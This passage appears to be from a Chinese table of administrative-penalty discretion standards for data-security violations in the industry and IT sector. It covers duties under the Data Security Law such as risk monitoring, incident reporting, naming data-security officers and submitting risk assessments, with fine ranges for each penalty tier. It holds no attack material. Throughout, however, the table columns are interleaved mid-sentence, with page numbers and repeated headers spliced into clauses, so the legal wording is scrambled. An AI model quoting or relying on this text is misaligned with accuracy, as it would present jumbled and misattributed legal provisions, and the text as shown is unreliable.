务、停业整顿、吊销相关业务 销相关业务许可证或 长,影响范围涉及多个行业、 许可证或者吊销营业执照;构 者吊销营业执照;构 地区的;对行业发展、社会 成犯罪的,依法追究刑事责任。 成犯罪的,依法追究 稳定和国家安全造成严重后 刑事责任。 果的。 — 19 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 违法行为轻微并及时改正, 《中华人民共和国数据安 没有造成危害后果的,或者 全法》第二十七条 开展数据处 违法行为当事人有证据足以 理活动应当依照法律、法规的 不予处罚 责令改正。 证明没有主观过错的,不予 规定,建立健全全流程数据安 行政处罚。初次违法且危害 对工业和信 全管理制度,组织开展数据安 后果轻微并及时改正的,可 息化领域数 全教育培训,采取相应的技术 以不予行政处罚。 据处理者利 措施和其他必要措施,保障数 造成较轻后果,对公民、法 用互联网等 据安全。利用互联网信息网络 责令改正,给予警告,人和组织合法权益、社会公 信息网络开 开展数据处理活动,应当在网 可以并处五万元以下 共利益造成损害的时间较 展数据处理 络安全 等及保护 制度的基 础 罚款,对直接负责的 短,影响范围较小,仅涉及 活动,未在网 上,履行上述数据安全保护义 减轻处罚 4 / 主管人员和其他直接 单个或少数企业,且主动消 络安全等级 务。 责任人员处一万元以 除或者减轻危害后果,在规 保护制度的 第四十五条 开展数据处 下罚款。 定期限内提前改正到位的, 基础上,履行 理活动的组织、个人不履行本 予以减轻处罚。 第二十七条 法第二十七条、第二十九条、 造成较轻后果,对公民、法 数据安全保 第三十条规定的数据安全保护 责令改正,给予警告, 人和组织合法权益、社会公 护义务的行 义务的,由有关主管部门责令 可以并处五万元以上 共利益造成损害的时间较 政处罚 改正,给予警告,可以并处五 三十五万元以下罚 短,影响范围较小,仅涉及 万元以上五十万元以下罚款, 从轻处罚 款,对直接负责的主 单个或少数企业,在规定期 对直接负责的主管人员和其他 管人员和其他直接责 限内采取积极有效措施,但 直接责任人员可以处一万元以 任人员处一万元以上 未完全改正到位、承诺继续 上十万元以下罚款。 七万元以下罚款。 加强改正的,予以从轻处罚。 — 20 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 处十万元以上五十万 造成严重后果,对公民、法 元以下罚款,对直接 人和组织合法权益、社会公 负责的主管人员和其 共利益造成损害的时间长, 从重处罚 他直接责任人员处两 影响范围大,涉及多个企业 万元以上十万元以下 或跨行业、跨地区的,予以 罚款。 从重处罚。 《中华人民共和国数据安 不予处罚 无 无 全法》第二十七条 开展数据处 减轻处罚 无 无 理活动应当依照法律、法规的 处五十万元以上一百 规定,建立健全全流程数据安 四十万元以下罚款, 全管理制度,组织开展数据安 拒不改正或者造成大量数据 并可以责令暂停相关 全教育培训,采取相应的技术 泄露等严重后果的,且对公 业务、停业整顿、吊 措施和其他必要措施,保障数 民、法人和组织合法权益、 销相关业务许可证或 据安全。利用互联网信息网络 从轻处罚 社会公共利益造成损害的时 者吊销营业执照,对 开展数据处理活动,应当在网 间较短,影响范围较小,仅 直接负责的主管人员 络安全等级保护制 度的基础 涉及单个或少数企业的,予 和其他直接责任人员 上,履行上述数据安全保护义 以从轻处罚。 处五万元以上十四万 务。 元以下罚款。 第四十五条 开展数据处 理活动的组织、个人不履行本 处一百万元以上二百 拒不改正或者造成大量数据 法第二十七条、第二十九条、 万元以下罚款,并责 泄露等严重后果的,且对公 第三十条规定的数据安全保护 从重处罚 令暂停相关业务、停 民、法人和组织合法权益、 义务的,且拒不改正或者造成 业整顿、吊销相关业 社会公共利益造成损害的时 大量数据泄露等严重后果的, 务许可证或者吊销营 间长,影响范围大,涉及多 — 21 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 处五十万元以上二百万元以下 业执照,对直接负责 个企业或跨行业、跨地区的, 罚款,并可以责令暂停相关业 的主管人员和其他直 予以从重处罚。 务、停业整顿、吊销相关业务 接责任人员处十万元 许可证或者吊销营业执照,对 以上二十万元以下罚 直接负责的主管人员和其他直 款。 接责任人员处五万元以上二十 万元以下罚款。 不予处罚 无 无 第四十五条 减轻处罚 无 无 违反国家核心数据管理制度, 从轻处罚 无 无 危害国家主权、安全和发展利 益的,由有关主管部门处二百 处四百万元以上一千 涉及 2 个以上数据处理者的 万元以上一千万元以下罚款, 万元以下罚款,并根 核心数据的,对公民、法人 并根据 情况责令 暂停相关 业 据情况责令暂停相关 和组织合法权益、社会公共 务、停业整顿、吊销相关业务 从重处罚业务、停业整顿、吊 利 益 造 成 损 害 的 持 续 时 间 许可证或者吊销营业执照;构 销相关业务许可证或 长,影响范围涉及多个行业、 成犯罪的,依法追究刑事责任。 者吊销营业执照;构 地区的;对行业发展、社会 成犯罪的,依法追究 稳定和国家安全造成严重后 刑事责任。 果的。 对工业和信 (三)未根据需要配备 《中华人民共和国数据安 明确数据安全负责人和管理 息化领域重 数据安全管理人员,统 全法》第二十七条 开展数据处 机构,落实数据安全保护责 5 要数据的数 筹负责数据处理活动 理活动应当依照法律、法规的 不予处罚 责令改正 任等要求落实不到位情节轻 据处理者,未 的安全监督管理,协助 规定,建立健全全流程数据安 微,且能够及时改正的,可 明确数据安 行业(领域)监管部门 全管理制度,组织开展数据安 以不予行政处罚。 — 22 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 全负责人和 开展工作; 全教育培训,采取相应的技术 责令改正,给予警告,明确数据安全负责人和管理 管理机构,落 (十三)工业和信息化 措施和其他必要措施,保障数 可以并处五万元以下 机构,落实数据安全保护责 实数据安全 领域重要数据和核心 据安全。利用互联网信息网络 罚款,对直接负责的 任等要求落实不到位情节较 减轻处罚 保护责任的 数据处理者,未建立覆 开展数据处理活动,应当在网 主管人员和其他直接 轻,且能够在规定期限内提 行政处罚 盖本单位相关部门的 络安全等级保护制 度的基础 责任人员处一万元以 前改正到位的,予以减轻处 数据安全工作体系,未 上,履行上述数据安全保护义 下罚款 罚。 明确数据安全负责人 务。 责令改正,给予警告,明确数据安全负责人和管理 和管理机构,未建立常 重要数据的处理者应当明 可以并处五万元以上 机构,落实数据安全保护责 态化沟通与协作机制; 确数据 安全负责 人和管理 机 三 十 五 万 元 以 下 罚 任等要求落实不到位情节较 构,落实数据安全保护责任。 从轻处罚 款,对直接负责的主 轻,在规定期限内采取积极 (十四)工业和信息化 第四十五条 开展数据处 管人员和其他直接责 有效措施,但未完全改正到 领域重要数据和核心 理活动的组织、个人不履行本 任人员处一万元以上 位、承诺继续加强改正的, 数据处理者,未明确数 法第二十七条、第二十九条、 七万元以下罚款 予以从轻处罚。 据处理关键岗位和岗 第三十条规定的数据安全保护 位职责,未要求关键岗 义务的,由有关主管部门责令 处十万元以上五十万 明确数据安全负责人和管理 位人员签署数据安全 改正,给予警告,可以并处五 元以下罚款,对直接 机构,落实数据安全保护责 责任书 万元以上五十万元以下罚款, 从重处罚 负责的主管人员和其 任等要求落实不到位情节较 对直接负责的主管人员和其他 他直接责任人员处两 轻,在规定期限内改正不积 直接责任人员可以处一万元以 万元以上十万元以下 极的,予以从重处罚。 上十万元以下罚款。 罚款 《中华人民共和国数据安 不予处罚 无 无 全法》第二十七条 开展数据处 理活动应当依照法律、法规的 减轻处罚 无 无 — 23 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 规定,建立健全全流程数据安 处五十万元以上一百 全管理制度,组织开展数据安 四十万元以下罚款, 全教育培训,采取相应的技术 并可以责令暂停相关 措施和其他必要措施,保障数 拒不改正,且明确数据安全 业务、停业整顿、吊 据安全。利用互联网信息网络 负责人和管理机构,落实数 销相关业务许可证或 开展数据处理活动,应当在网 从轻处罚 者吊销营业执照,对 据安全保护责任等要求落实 络安全等级保护制 度的基础 不到位情节较轻的,予以从 直接负责的主管人员 上,履行上述数据安全保护义 轻处罚。 和其他直接责任人员 务。重要数据的处理者应当明 处五万元以上十四万 确数据 安全负责 人和管理 机 元以下罚款。 构,落实数据安全保护责任。 第四十五条 开展数据处 理活动的组织、个人不履行本 处一百万元以上二百 法第二十七条、第二十九条、 万元以下罚款,并责 第三十条规定的数据安全保护 令暂停相关业务、停 义务的,且拒不改正或者造成 拒不改正,且明确数据安全 业整顿、吊销相关业 大量数据泄露等严重后果的, 负责人和管理机构,落实数 务许可证或者吊销营 处五十万元以上二百万元以下 从重处罚 据安全保护责任等要求落实 业执照,对直接负责 罚款,并可以责令暂停相关业 不到位情节较重的,予以从 的主管人员和其他直 务、停业整顿、吊销相关业务 重处罚。 接责任人员处十万元 许可证或者吊销营业执照,对 以上二十万元以下罚 直接负责的主管人员和其他直 款。 接责任人员处五万元以上二十 万元以下罚款。 — 24 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 不予处罚 无 无 第四十五条 违反国家核 减轻处罚 无 无 心数据管理制度,危害国家主 权、安全和发展利益的,由有 从轻处罚 无 无 关主管部门处二百万元以上一 处四百万元以上一千 涉及 2 个以上数据处理者的 千万元以下罚款,并根据情况 万元以下罚款,并根 核心数据的,对公民、法人 责令暂停相关业务、停业整顿、 据情况责令暂停相关 和组织合法权益、社会公共 吊销相关业务许可证或者吊销 业务、停业整顿、吊 利 益 造 成 损 害 的 持 续 时 间 营业执照;构成犯罪的,依法 从重处罚 销相关业务许可证或 长,影响范围涉及多个行业、 追究刑事责任。 者吊销营业执照;构 地区的;对行业发展、社会 成犯罪的,依法追究 稳定和国家安全造成严重后 刑事责任。 果的。 对工业和信 (七)未开展数据安全 《中华人民共和国数据安 违法行为轻微并及时改正, 息化领域数 风险监测,及时排查安 全法》第二十九条 开展数据处 没有造成危害后果的,或者 据处理者开 全隐患,采取必要的措 理活动应当加强风险监测,发 违法行为当事人有证据足以 展数据处理 施防范数据安全风险;现数据安全缺陷、漏洞等风险 不予处罚 责令改正 证明没有主观过错的,不予 活动,未加强 (八)发现可能造成较 时,应当立即采取补救措施; 行政处罚。初次违法且危害 6 风险监测,发 大及以上数据安全事 发生数据安全事件时,应当立 后果轻微并及时改正的,可 现数据安全 件的风险后,未按照风 即采取处置措施,按照规定及 以不予行政处罚。 缺陷、漏洞等 险信息报送与共享工 时告知用户并向有关主管部门 责令改正,给予警告,造成较轻后果,对公民、法 风险时,未立 作机制向所在地行业 报告。 减轻处罚 可以并处五万元以下 人和组织合法权益、社会公 即采取补救 监管部门报告并及时 第四十五条 开展数据处 罚款,对直接负责的 共利益造成损害的时间较 — 25 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 措施的行政 处置 理活动的组织、个人不履行本 主管人员和其他直接 短,影响范围较小,仅涉及 处罚 法第二十七条、第二十九条、 责任人员处一万元以 单个或少数企业,且主动消 第三十条规定的数据安全保护 下罚款 除或者减轻危害后果,在规 义务的,由有关主管部门责令 定期限内提前改正到位的, 改正,给予警告,可以并处五 予以减轻处罚。 万元以上五十万元以下罚款, 造成较轻后果,对公民、法 责令改正,给予警告, 对直接负责的主管人员和其他 人和组织合法权益、社会公 可以并处五万元以上 直接责任人员可以处一万元以 共利益造成损害的时间较 三十五万元以下罚 上十万元以下罚款。 短,影响范围较小,仅涉及 从轻处罚 款,对直接负责的主 单个或少数企业,在规定期 管人员和其他直接责 限内采取积极有效措施,但 任人员处一万元以上 未完全改正到位、承诺继续 七万元以下罚款 加强改正的,予以从轻处罚。 处十万元以上五十万 造成严重后果,对公民、法 元以下罚款,对直接 人和组织合法权益、社会公 负责的主管人员和其 共利益造成损害的时间长, 从重处罚 他直接责任人员处两 影响范围大,涉及多个企业 万元以上十万元以下 或跨行业、跨地区的,予以 罚款 从重处罚。 《中华人民共和国数据安 不予处罚 无 无 全法》第二十九条 开展数据处 减轻处罚 无 无 — 26 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 理活动应当加强风险监测,发 处五十万元以上一百 现数据安全缺陷、漏洞等风险 四十万元以下罚款, 拒不改正或者造成大量数据 时,应当立即采取补救措施; 并可以责令暂停相关 泄露等严重后果的,且对公 发生数据安全事件时,应当立 业务、停业整顿、吊 民、法人和组织合法权益、 即采取处置措施,按照规定及 销相关业务许可证或 从轻处罚 社会公共利益造成损害的时 时告知用户并向有关主管部门 者吊销营业执照,对 间较短,影响范围较小,仅 报告。 直接负责的主管人员 涉及单个或少数企业的,予 第四十五条 开展数据处 和其他直接责任人员 以从轻处罚。 理活动的组织、个人不履行本 处五万元以上十四万 法第二十七条、第二十九条、 元以下罚款。 第三十条规定的数据安全保护 处一百万元以上二百 义务的,且拒不改正或者造成 万元以下罚款,并责 拒不改正或者造成大量数据 大量数据泄露等严重后果的, 令暂停相关业务、停 泄露等严重后果的,且对公 处五十万元以上二百万元以下 业整顿、吊销相关业 民、法人和组织合法权益、 罚款,并可以责令暂停相关业 务许可证或者吊销营 从重处罚 社会公共利益造成损害的时 务、停业整顿、吊销相关业务 业执照,对直接负责 间长,影响范围大,涉及多 许可证或者吊销营业执照,对 的主管人员和其他直 个企业或跨行业、跨地区的, 直接负责的主管人员和其他直 接责任人员处十万元 予以从重处罚。 接责任人员处五万元以上二十 以上二十万元以下罚 万元以下罚款。 款。 第四十五条 违反国家核 不予处罚 无 无 心数据管理制度,危害国家主 权、安全和发展利益的,由有 减轻处罚 无 无 — 27 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 关主管部门处二百万元以上一 从轻处罚 无 无 千万元以下罚款,并根据情况 处四百万元以上一千 涉及 2 个以上数据处理者的 责令暂停相关业务、停业整顿、 万元以下罚款,并根 核心数据的,对公民、法人 吊销相关业务许可证或者吊销 据情况责令暂停相关 和组织合法权益、社会公共 营业执照;构成犯罪的,依法 业务、停业整顿、吊 利 益 造 成 损 害 的 持 续 时 间 追究刑事责任。 从重处罚 销相关业务许可证或 长,影响范围涉及多个行业、 者吊销营业执照;构 地区的;对行业发展、社会 成犯罪的,依法追究 稳定和国家安全造成严重后 刑事责任。 果的。 (九)数据安全事 《中华人民共和国数据安 违法行为轻微并及时改正, 件发生后,未按照应急 全法》第二十九条 开展数据处 没有造成危害后果的,或者 预案开展应急处置; 理活动应当加强风险监测,发 违法行为当事人有证据足以 (十)数据安全事 现数据安全缺陷、漏洞等风险 不予处罚 责令改正 证明没有主观过错的,不予 对工业和信 件发生后,未按照规定 时,应当立即采取补救措施; 行政处罚。初次违法且危害 息化领域数 向所在地行业监管部 发生数据安全事件时,应当立 后果轻微并及时改正的,可 据处理者发 门报告; 即采取处置措施,按照规定及 以不予行政处罚。 生数据安全 7 (十七)涉及重要 时告知用户并向有关主管部门 造成较轻后果,对公民、法 事件时,未立 数据和核心数据的安 报告。 责令改正,给予警告,人和组织合法权益、社会公 即采取处置 全事件,未第一时间向 第四十五条 开展数据处 可以并处五万元以下 共利益造成损害的时间较 措施的行政 所在地行业监管部门 理活动的组织、个人不履行本 罚款,对直接负责的 短,影响范围较小,仅涉及 处罚 减轻处罚 报告,事件处置完成后 法第二十七条、第二十九条、 主管人员和其他直接 单个或少数企业,且主动消 未在规定期限内形成 第三十条规定的数据安全保护 责任人员处一万元以 除或者减轻危害后果,在规 总结报告,每年未向本 义务的,由有关主管部门责令 下罚款 定期限内提前改正到位的, 地区行业监管部门报 改正,给予警告,可以并处五 予以减轻处罚。 — 28 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 告数据安全事件处置 万元以上五十万元以下罚款, 造成较轻后果,对公民、法 责令改正,给予警告, 情况 对直接负责的主管人员和其他 人和组织合法权益、社会公 可以并处五万元以上 直接责任人员可以处一万元以 共利益造成损害的时间较 三十五万元以下罚 上十万元以下罚款。 短,影响范围较小,仅涉及 从轻处罚 款,对直接负责的主 单个或少数企业,在规定期 管人员和其他直接责 限内采取积极有效措施,但 任人员处一万元以上 未完全改正到位、承诺继续 七万元以下罚款 加强改正的,予以从轻处罚。 处十万元以上五十万 造成严重后果,对公民、法 元以下罚款,对直接 人和组织合法权益、社会公 负责的主管人员和其 共利益造成损害的时间长, 从重处罚 他直接责任人员处两 影响范围大,涉及多个企业 万元以上十万元以下 或跨行业、跨地区的,予以 罚款 从重处罚。 《中华人民共和国数据安 不予处罚 无 无 全法》第二十九条 开展数据处 理活动应当加强风险监测,发 减轻处罚 无 无 现数据安全缺陷、漏洞等风险 处五十万元以上一百 拒不改正或者造成大量数据 时,应当立即采取补救措施; 四十万元以下罚款, 泄露等严重后果的,且对公 发生数据安全事件时,应当立 并可以责令暂停相关 民、法人和组织合法权益、 即采取处置措施,按照规定及 从轻处罚 业务、停业整顿、吊 社会公共利益造成损害的时 时告知用户并向有关主管部门 销相关业务许可证或 间较短,影响范围较小,仅 报告。 者吊销营业执照,对 涉及单个或少数企业的,予 第四十五条 开展数据处 直接负责的主管人员 以从轻处罚。 — 29 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 理活动的组织、个人不履行本 和其他直接责任人员 法第二十七条、第二十九条、 处五万元以上十四万 第三十条规定的数据安全保护 元以下罚款。 义务的,且拒不改正或者造成 处一百万元以上二百 大量数据泄露等严重后果的, 万元以下罚款,并责 拒不改正或者造成大量数据 处五十万元以上二百万元以下 令暂停相关业务、停 泄露等严重后果的,且对公 罚款,并可以责令暂停相关业 业整顿、吊销相关业 民、法人和组织合法权益、 务、停业整顿、吊销相关业务 务许可证或者吊销营 从重处罚 社会公共利益造成损害的时 许可证或者吊销营业执照,对 业执照,对直接负责 间长,影响范围大,涉及多 直接负责的主管人员和其他直 的主管人员和其他直 个企业或跨行业、跨地区的, 接责任人员处五万元以上二十 接责任人员处十万元 予以从重处罚。 万元以下罚款。 以上二十万元以下罚 款。 不予处罚 无 无 第四十五条 违反国家核 减轻处罚 无 无 心数据管理制度,危害国家主 权、安全和发展利益的,由有 从轻处罚 无 无 关主管部门处二百万元以上一 处四百万元以上一千 涉及 2 个以上数据处理者的 千万元以下罚款,并根据情况 万元以下罚款,并根 核心数据的,对公民、法人 责令暂停相关业务、停业整顿、 据情况责令暂停相关 和组织合法权益、社会公共 吊销相关业务许可证或者吊销 从重处罚 业务、停业整顿、吊 利 益 造 成 损 害 的 持 续 时 间 营业执照;构成犯罪的,依法 销相关业务许可证或 长,影响范围涉及多个行业、 追究刑事责任。 者吊销营业执照;构 地区的;对行业发展、社会 成犯罪的,依法追究 稳定和国家安全造成严重后 — 30 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 刑事责任。 果的。 违法行为轻微并及时改正, 没有造成危害后果的,或者 《中华人民共和国数据安 违法行为当事人有证据足以 全法》第二十九条 开展数据处 不予处罚 责令改正 证明没有主观过错的,不予 (十一)数 据 安 理活动应当加强风险监测,发 行政处罚。初次违法且危害 全事件发生后,未按照 现数据安全缺陷、漏洞等风险 后果轻微并及时改正的,可 时,应当立即采取补救措施; 对工业和信 规定及时告知用户,并 以不予行政处罚。 发生数据安全事件时,应当立 息化领域数 提供减轻危害措施; 造成较轻后果,对公民、法 (十七)涉及重要 即采取处置措施,按照规定及 据处理者发 责令改正,给予警告,人和组织合法权益、社会公 数据和核心数据的安 时告知用户并向有关主管部门 生数据安全 可以并处五万元以下 共利益造成损害的时间较 全事件, 未第一时间向 报告。 事件时,未按 罚款,对直接负责的 短,影响范围较小,仅涉及 8 所在地行业监管部门 第四十五条 开展数据处 减轻处罚 照规定及时 主管人员和其他直接 单个或少数企业,且主动消 报告, 事件处置完成后 理活动的组织、个人不履行本 告知用户并 责任人员处一万元以 除或者减轻危害后果,在规 未在规定期限内形成 法第二十七条、第二十九条、 向有关主管 下罚款 定期限内提前改正到位的, 总结报告, 每年未向本 第三十条规定的数据安全保护 部门报告的 予以减轻处罚。 地区行业监管部门报 义务的,由有关主管部门责令 行政处罚 责令改正,给予警告,造成较轻后果,对公民、法 告数据安全事件处置 改正,给予警告,可以并处五 可以并处五万元以上 人和组织合法权益、社会公 情况 万元以上五十万元以下罚款, 三 十 五 万 元 以 下 罚 共利益造成损害的时间较 对直接负责的主管人员和其他 从轻处罚 款,对直接负责的主 短,影响范围较小,仅涉及 直接责任人员可以处一万元以 管人员和其他直接责 单个或少数企业,在规定期 上十万元以下罚款。 任人员处一万元以上 限内采取积极有效措施,但 七万元以下罚款 未完全改正到位、承诺继续 — 31 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 加强改正的,予以从轻处罚。 处十万元以上五十万 造成严重后果,对公民、法 元以下罚款,对直接 人和组织合法权益、社会公 负责的主管人员和其 共利益造成损害的时间长, 从重处罚 他直接责任人员处两 影响范围大,涉及多个企业 万元以上十万元以下 或跨行业、跨地区的,予以 罚款 从重处罚。 《中华人民共和国数据安 不予处罚 无 无 全法》第二十九条 开展数据处 减轻处罚 无 无 理活动应当加强风险监测,发 处五十万元以上一百 现数据安全缺陷、漏洞等风险 四十万元以下罚款, 拒不改正或者造成大量数据 时,应当立即采取补救措施; 并可以责令暂停相关 泄露等严重后果的,且对公 发生数据安全事件时,应当立 业务、停业整顿、吊 民、法人和组织合法权益、 即采取处置措施,按照规定及 销相关业务许可证或 从轻处罚 社会公共利益造成损害的时 时告知用户并向有关主管部门 者吊销营业执照,对 间较短,影响范围较小,仅 报告。 直接负责的主管人员 涉及单个或少数企业的,予 第四十五条 开展数据处 和其他直接责任人员 以从轻处罚。 理活动的组织、个人不履行本 处五万元以上十四万 法第二十七条、第二十九条、 元以下罚款。 第三十条规定的数据安全保护 处一百万元以上二百 拒不改正或者造成大量数据 义务的,且拒不改正或者造成 万元以下罚款,并责 泄露等严重后果的,且对公 从重处罚 大量数据泄露等严重后果的, 令暂停相关业务、停 民、法人和组织合法权益、 处五十万元以上二百万元以下 业整顿、吊销相关业 社会公共利益造成损害的时 — 32 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 罚款,并可以责令暂停相关业 务许可证或者吊销营 间长,影响范围大,涉及多 务、停业整顿、吊销相关业务 业执照,对直接负责 个企业或跨行业、跨地区的, 许可证或者吊销营业执照,对 的主管人员和其他直 予以从重处罚。 直接负责的主管人员和其他直 接责任人员处十万元 接责任人员处五万元以上二十 以上二十万元以下罚 万元以下罚款。 款。 不予处罚 无 无 第四十五条 违反国家核 减轻处罚 无 无 心数据管理制度,危害国家主 从轻处罚 无 无 权、安全和发展利益的,由有 处四百万元以上一千 涉及 2 个以上数据处理者的 关主管部门处二百万元以上一 万元以下罚款,并根 核心数据的,对公民、法人 千万元以下罚款,并根据情况 据情况责令暂停相关 和组织合法权益、社会公共 责令暂停相关业务、停业整顿、 业务、停业整顿、吊 利 益 造 成 损 害 的 持 续 时 间 从重处罚 吊销相关业务许可证或者吊销 销相关业务许可证或 长,影响范围涉及多个行业、 营业执照;构成犯罪的,依法 者吊销营业执照;构 地区的;对行业发展、社会 追究刑事责任。 成犯罪的,依法追究 稳定和国家安全造成严重后 刑事责任。 果的。 对工业和信 (十八)工业和信息化 《中华人民共和国数据安 违法行为轻微并及时改正, 息化领域重 领域重要数据和核心 全法》第二十九条 开展数据处 没有造成危害后果的,或者 要数据的处 数据处理者,未按照规 理活动应当加强风险监测,发 违法行为当事人有证据足以 9 理者未按照 定对其数据处理活动 现数据安全缺陷、漏洞等风险 不予处罚 责令改正 证明没有主观过错的,不予 规定对其数 每年至少开展一次风 时,应当立即采取补救措施; 行政处罚。初次违法且危害 据处理活动 险评估,及时整改风险 发生数据安全事件时,应当立 后果轻微并及时改正的,可 定期开展风 问题,并向有关主管部 即采取处置措施,按照规定及 以不予行政处罚。 — 33 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 险评估,并向 门报送风险评估报告 时告知用户并向有关主管部门 造成较轻后果,对公民、法 有关主管部 报告。 责令改正,给予警告,人和组织合法权益、社会公 门报送风险 第四十五条 开展数据处 可以并处五万元以下 共利益造成损害的时间较 评估报告的 理活动的组织、个人不履行本 罚款,对直接负责的 短,影响范围较小,仅涉及 行政处罚 法第二十七条、第二十九条、 减轻处罚 主管人员和其他直接 单个或少数企业,且主动消 第三十条规定的数据安全保护 责任人员处一万元以 除或者减轻危害后果,在规 义务的,由有关主管部门责令 下罚款 定期限内提前改正到位的, 改正,给予警告,可以并处五 予以减轻处罚。 万元以上五十万元以下罚款, 对直接负责的主管人员和其他 造成较轻后果,对公民、法 直接责任人员可以处一万元以 责令改正,给予警告, 人和组织合法权益、社会公 上十万元以下罚款。 可以并处五万元以上 共利益造成损害的时间较 三十五万元以下罚 短,影响范围较小,仅涉及 从轻处罚 款,对直接负责的主 单个或少数企业,在规定期 管人员和其他直接责 限内采取积极有效措施,但 任人员处一万元以上 未完全改正到位、承诺继续 七万元以下罚款 加强改正的,予以从轻处罚。 处十万元以上五十万 造成严重后果,对公民、法 元以下罚款,对直接 人和组织合法权益、社会公 负责的主管人员和其 共利益造成损害的时间长, 从重处罚 他直接责任人员处两 影响范围大,涉及多个企业 万元以上十万元以下 或跨行业、跨地区的,予以 罚款 从重处罚。 — 34 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 《中华人民共和国数据安 不予处罚 无 无 全法》第二十九条 开展数据处 减轻处罚 无 无 理活动应当加强风险监测,发 处五十万元以上一百 现数据安全缺陷、漏洞等风险 四十万元以下罚款, 拒不改正或者造成大量数据 时,应当立即采取补救措施; 并可以责令暂停相关 泄露等严重后果的,且对公 发生数据安全事件时,应当立 业务、停业整顿、吊 民、法人和组织合法权益、 即采取处置措施,按照规定及 销相关业务许可证或 从轻处罚 社会公共利益造成损害的时 时告知用户并向有关主管部门 者吊销营业执照,对 间较短,影响范围较小,仅 报告。 直接负责的主管人员 涉及单个或少数企业的,予 第四十五条 开展数据处 和其他直接责任人员 以从轻处罚。 理活动的组织、个人不履行本 处五万元以上十四万 法第二十七条、第二十九条、 元以下罚款。 第三十条规定的数据安全保护 处一百万元以上二百 义务的,且拒不改正或者造成 万元以下罚款,并责 拒不改正或者造成大量数据 大量数据泄露等严重后果的, 令暂停相关业务、停 泄露等严重后果的,且对公 处五十万元以上二百万元以下 业整顿、吊销相关业 民、法人和组织合法权益、 罚款,并可以责令暂停相关业 务许可证或者吊销营 从重处罚 社会公共利益造成损害的时 务、停业整顿、吊销相关业务 业执照,对直接负责 间长,影响范围大,涉及多 许可证或者吊销营业执照,对 的主管人员和其他直 个企业或跨行业、跨地区的, 直接负责的主管人员和其他直 接责任人员处十万元 予以从重处罚。 接责任人员处五万元以上二十 以上二十万元以下罚 万元以下罚款。 款。 第四十五条 不予处罚 无 无 违反国家核心数据管理制度, 减轻处罚 无 无 — 35 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 危害国家主权、安全和发展利 从轻处罚 无 无 益的,由有关主管部门处二百 处四百万元以上一千 涉及 2 个以上数据处理者的 万元以上一千万元以下罚款, 万元以下罚款,并根 核心数据的,对公民、法人 并根据 情况责令 暂停相关 业 据情况责令暂停相关 和组织合法权益、社会公共 务、停业整顿、吊销相关业务 业务、停业整顿、吊 利 益 造 成 损 害 的 持 续 时 间 从重处罚 许可证或者吊销营业执照;构 销相关业务许可证或 长,影响范围涉及多个行业、 成犯罪的,依法追究刑事责任。 者吊销营业执照;构 地区的;对行业发展、社会 成犯罪的,依法追究 稳定和国家安全造成严重后 刑事责任。 果的。 对工业和信 《中华人民共和国数据安 违法行为轻微并及时改正, 息化领域重 全法》第三十条 重要数据的处 没有造成危害后果的,或者 要数据的处 理者应当按照规定对其数据处 违法行为当事人有证据足以 理者报送的 (十九)工业和信息化 理活动定期开展风险评估并向 不予处罚 责令改正 证明没有主观过错的,不予 风险评估报 领域重要数据和核心 有关部门报送风险评估报告。 行政处罚。初次违法且危害 告未包括处 数据的处理者报送的 风险评估报告应当包括处 后果轻微并及时改正的,可 理的重要数 风险评估报告未包括 理的重要数据的种类、数量, 以不予行政处罚。 10 据的种类、数 处理的重要数据的种 开展数据处理活动的情况,面 造成较轻后果,对公民、法 量,开展数据 类、数量,开展数据处 临的数据安全风险及其应对措 责令改正,给予警告,人和组织合法权益、社会公 处理活动的 理活动的情况,面临的 施等。 可以并处五万元以下 共利益造成损害的时间较 情况,面临的 数据安全风险及其应 第四十五条 开展数据处 罚款,对直接负责的 短,影响范围较小,仅涉及 减轻处罚 数据安全风 对措施等 理活动的组织、个人不履行本 主管人员和其他直接 单个或少数企业,且主动消 险及其应对 法第二十七条、第二十九条、 责任人员处一万元以 除或者减轻危害后果,在规 措施等的行 第三十条规定的数据安全保护 下罚款 定期限内提前改正到位的, 政处罚 义务的,由有关主管部门责令 予以减轻处罚。 — 36 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 改正,给予警告,可以并处五 造成较轻后果,对公民、法 责令改正,给予警告, 万元以上五十万元以下罚款, 人和组织合法权益、社会公 可以并处五万元以上 对直接负责的主管人员和其他 共利益造成损害的时间较 三十五万元以下罚 直接责任人员可以处一万元以 短,影响范围较小,仅涉及 从轻处罚 款,对直接负责的主 上十万元以下罚款。 单个或少数企业,在规定期 管人员和其他直接责 限内采取积极有效措施,但 任人员处一万元以上 未完全改正到位、承诺继续 七万元以下罚款 加强改正的,予以从轻处罚。 处十万元以上五十万 造成严重后果,对公民、法 元以下罚款,对直接 人和组织合法权益、社会公 负责的主管人员和其 共利益造成损害的时间长, 从重处罚 他直接责任人员处两 影响范围大,涉及多个企业 万元以上十万元以下 或跨行业、跨地区的,予以 罚款 从重处罚。 《中华人民共和国数据安 不予处罚 无 无 全法》第三十条 重要数据的处 理者应当按照规定对其数据处 减轻处罚 无 无 理活动定期开展风险评估并向 处五十万元以上一百 拒不改正或者造成大量数据 有关部门报送风险评估报告。 四十万元以下罚款, 泄露等严重后果的,且对公 风险评估报告应当包括处 并可以责令暂停相关 民、法人和组织合法权益、 从轻处罚 理的重要数据的种类、数量, 